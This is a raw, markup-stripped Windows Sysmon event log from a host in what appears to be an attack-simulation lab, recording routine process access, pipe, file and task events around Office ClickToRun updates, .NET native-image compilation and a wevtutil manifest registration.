14:58:01.920{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF9-607E-F50D-00000000BB01}7080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000076996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.889{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.873{A7A01FEF-EBF9-607E-F30D-00000000BB01}53841428C:\Windows\system32\conhost.exe{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.857{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-F30D-00000000BB01}5384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.857{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.857{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.857{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.857{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.857{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.857{A7A01FEF-EBF8-607E-DD0D-00000000BB01}44723180C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2f9c6d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2efed5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000076987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.859{A7A01FEF-EBF9-607E-F20D-00000000BB01}5676C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe im "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man" /rf:"C:\Program Files\Microsoft Office\root\Office16\msoetwres.dll" /mf:"C:\Program Files\Microsoft Office\root\Office16\msoetwres.dll"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /I /Extension /Msi /StreamFull MsiName=C2RInt.16.msi,C2RIntLoc.en-us.16.msi,* PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 23542300x800000000000000076986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.857{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.manMD5=C1E8B625377C75454266F9D172D2F77D,SHA256=7847E5BA06CA0A834454A3C62EC343DCAA4339E6EF2ED5BD42E460ADE5331628,IMPHASH=00000000000000000000000000000000falsefalse - rename failed with status 0xc0000022 10341000x800000000000000076985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.842{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-F10D-00000000BB01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.826{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-F10D-00000000BB01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.826{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF9-607E-F10D-00000000BB01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.811{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C818D3725B3FCE220E2AF99CE6F741E,SHA256=793AC7F77C1DECAC247C5DFE3FEB66E6DB7109A574390C21DC9E861C1ECE942A,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000076981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000076979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:58:01.779{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\Office Feature Updates Logon2021-04-20 14:55:55.829 23542300x800000000000000076978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.779{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26EEAFE7B63F1899F0D03E09F647FFD7,SHA256=25A7C941753033EF37C2790E556A8BA70C918D1D5B80A668AD6C4EFAA0E02500,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000076977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.764{A7A01FEF-B624-607E-0B00-00000000BB01}8602320C:\Windows\system32\lsass.exe{A7A01FEF-EBF9-607E-EF0D-00000000BB01}4028C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.764{A7A01FEF-B624-607E-0B00-00000000BB01}8602320C:\Windows\system32\lsass.exe{A7A01FEF-EBF9-607E-EF0D-00000000BB01}4028C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.764{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-EF0D-00000000BB01}4028C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000076970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:01.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.748{A7A01FEF-EBF9-607E-F00D-00000000BB01}7367016C:\Windows\system32\conhost.exe{A7A01FEF-EBF9-607E-EF0D-00000000BB01}4028C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF9-607E-EE0D-00000000BB01}5872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.748{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF9-607E-F00D-00000000BB01}736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.748{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 